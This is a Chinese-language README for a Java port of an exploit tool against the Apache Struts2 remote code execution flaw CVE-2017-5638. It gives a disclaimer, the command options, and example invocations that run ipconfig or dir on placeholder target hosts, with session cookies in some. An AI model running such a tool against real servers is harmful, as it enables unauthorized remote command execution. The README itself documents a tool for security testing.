这是一个对 Python 漏洞利用代码的 Java 移植版本,原代码位于:https://www.exploit-db.com/exploits/41570/。
该软件编写为无外部依赖。
此工具仅供安全工程师和应用程序安全人员用于安全评估。请负责任地使用此工具。本人不对任何人使用此应用程序的方式承担责任。对于因使用此工具造成的任何损害或引发的任何犯罪,本人概不负责。
用法:
java -jar struts2_cve-2017-5638.jar [选项]
描述:
利用 Apache Struts2 远程代码执行漏洞(CVE-2017-5638)。
选项:
-h, --help
打印此帮助信息并退出。
-u, --url [目标URL]
将执行漏洞利用的目标URL。
-cmd, --command [要执行的命令]
将在远程机器上执行的命令。
--cookies [cookies]
可选。传入请求的Cookie,例如身份验证Cookie。
-v, --verbose
可选。增加详细输出。
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
本项目采用 MIT 许可证授权 - 详情参见 LICENSE.txt 文件。